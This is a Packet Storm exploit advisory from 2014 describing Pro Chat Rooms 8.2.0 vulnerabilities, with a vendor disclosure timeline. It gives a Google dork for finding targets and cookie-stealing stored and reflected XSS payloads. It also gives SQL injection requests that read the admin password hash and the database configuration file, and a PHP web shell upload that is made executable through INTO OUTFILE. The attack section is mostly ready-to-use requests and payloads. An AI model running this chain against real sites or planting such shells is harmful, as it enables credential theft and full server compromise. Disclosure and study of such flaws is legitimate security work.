exploit the possibilities

Pro Chat Rooms 8.2.0 XSS / Shell Upload / SQL Injection

Pro Chat Rooms 8.2.0 XSS / Shell Upload / SQL Injection
Posted Aug 6, 2014
Authored by Mike Manzotti

Pro Chat Rooms version 8.2.0 suffers from cross site scripting, remote shell upload, and remote SQL injection vulnerabilities.

tags | exploit, remote, shell, vulnerability, xss, sql injection
MD5 | e03ccb4db62a6eff3013f91134fc48a7

Pro Chat Rooms 8.2.0 XSS / Shell Upload / SQL Injection

Change Mirror Download
# Exploit Title: Pro Chat Rooms v8.2.0 - Multiple Vulnerabilities
# Google Dork: intitle:"Powered by Pro Chat Rooms"
# Date: 5 August 2014
# Exploit Author: Mike Manzotti @ Dionach Ltd
# Vendor Homepage: http://prochatrooms.com
# Software Link: http://prochatrooms.com/software.php
# Version: v8.2.0
# Tested on: Debian (Apache+MySQL)

1) Stored XSS
=============

Text Chat Room Software of ProoChatRooms is vulnerable to Stored XSS. After registered an account, an attacker can upload a profile picture containing Javascript code as shown below:

POST: http://<WEBSITE>/prochatrooms/profiles/index.php?id=1
Content-Disposition: form-data; name="uploadedfile"; filename="nopic333.jpg"
Content-Type: image/jpeg

<script>alert(document.cookie)</script>

By inspecting the response, the web application returns a 32 digits value in the HTML tag "imgID" as shown below:

Response:
<input type="hidden" name="imgID" value="798ae9b06cd900b95ed5a60e02419d4b">

The picture is uploaded under the directory "/profiles/uploads" and is accessible by force browsing to the 32 digits value as shown below:

http://<WEBSITE>/prochatrooms/profiles/uploads/798ae9b06cd900b95ed5a60e02419d4b

Image



2) Reflected XSS
=============

Text Chat Room Software of ProoChatRooms is vulnerable to Reflected XSS. The parameter "edit" is not encoded:

http://<WEBSITE>/prochatrooms/profiles/index.php?id=1&edit="><script>alert(document.cookie)</script>



3) SQL Injection
================

Text Chat Room Software of ProoChatRooms is vulnerable to SQL injections. Across the all source code of web application, parameterized queries are used to query the database. However, a lack of data sanitization of three parameters leaves the web application vulnerable to SQLi. The vulnerable parameters are located as shown below:

prochatrooms_v8.2.0/includes/functions.php: ~2437
$params = array(
'password' => md5($password),
'email' => makeSafe($email),
'id' => $id
);
$query = "UPDATE prochatrooms_users
SET email = '".$email."',
password='".md5($password)."'
WHERE id = '".$id."'
";

prochatrooms_v8.2.0/includes/functions.php: ~2449
$query = "UPDATE prochatrooms_users
SET email = '".$email."'
WHERE id = '".$id."'
";

prochatrooms_v8.2.0/includes/functions.php: ~3110
$query = "UPDATE prochatrooms_users
SET active = '".$offlineTime."', online = '0'
WHERE username = '".makeSafe($toname)."'
";

Note that the “makeSafe” function is defined as shown below and will protect against XSS attacks only:

prochatrooms_v8.2.0/includes/functions.php: ~125
function makeSafe($data)
{
$data = htmlspecialchars($data);

return $data;
}


After registering an account, an attacker can exploit the SQL injection by editing the field email as shown below which will retrieve the MD5 hashed password of the administrator:

POST http://<WEBSITE>/prochatrooms/profiles/index.php?id=1
Content-Disposition: form-data; name="profileEmail"

mm@1dn.eu', email=(select adminLogin from prochatrooms_config) where id ='1';#


The following SQL injection will retrieve the SQL connection string, which probably has clear-text database credentials.

POST http://<WEBSITE>/prochatrooms/profiles/index.php?id=1
Content-Disposition: form-data; name="profileEmail"

mm@1dn.eu', email=(select load_file('/var/www/prochatrooms/includes/db.php')) where id ='1';#




4) Arbitrary File Upload
=========================

It is possible to combine the Stored XSS and SQL injection vulnerabilities to upload a web shell on the server.

The following request will upload a PHP web shell and the web application will return a 32 digit value.

POST: http://<WEBSITE>/prochatrooms/profiles/index.php?id=1
Content-Disposition: form-data; name="uploadedfile"; filename="m.jpg"
Content-Type: application/octet-stream

<?php system($_GET[cmd]);?>

Response:
<input type="hidden" name="imgID" value="82d0635538da4eac42da25f8f95f8c45">

Since the uploaded web shell is without extension it will not be executed:

http://<WEBSITE>/prochatrooms/profiles/uploads/82d0635538da4eac42da25f8f95f8c45
<?php system($_GET[cmd]);?>

Image:


However, exploiting the SQL injection it is possible to rename the file by appending a .php extension

POST http://<WEBSITE>/prochatrooms/profiles/index.php?id=1
Content-Disposition: form-data; name="profileEmail"

mm@1dn.eu' where id ='1'; SELECT load_file('/var/www/prochatrooms/profiles/uploads/82d0635538da4eac42da25f8f95f8c45') INTO OUTFILE '/var/www/prochatrooms/profiles/uploads/s.php';#

Web shell:
http://<WEBSITE>/prochatrooms/profiles/uploads/s.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Image:



Timeline
========
19/07/2014: Vendor informed via email
04/08/2014: Vendor informed via email
05/08/2014: Public Disclosure

Kind regards,
Mike
Login or Register to add favorites

File Archive:

December 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    18 Files
  • 2
    Dec 2nd
    11 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close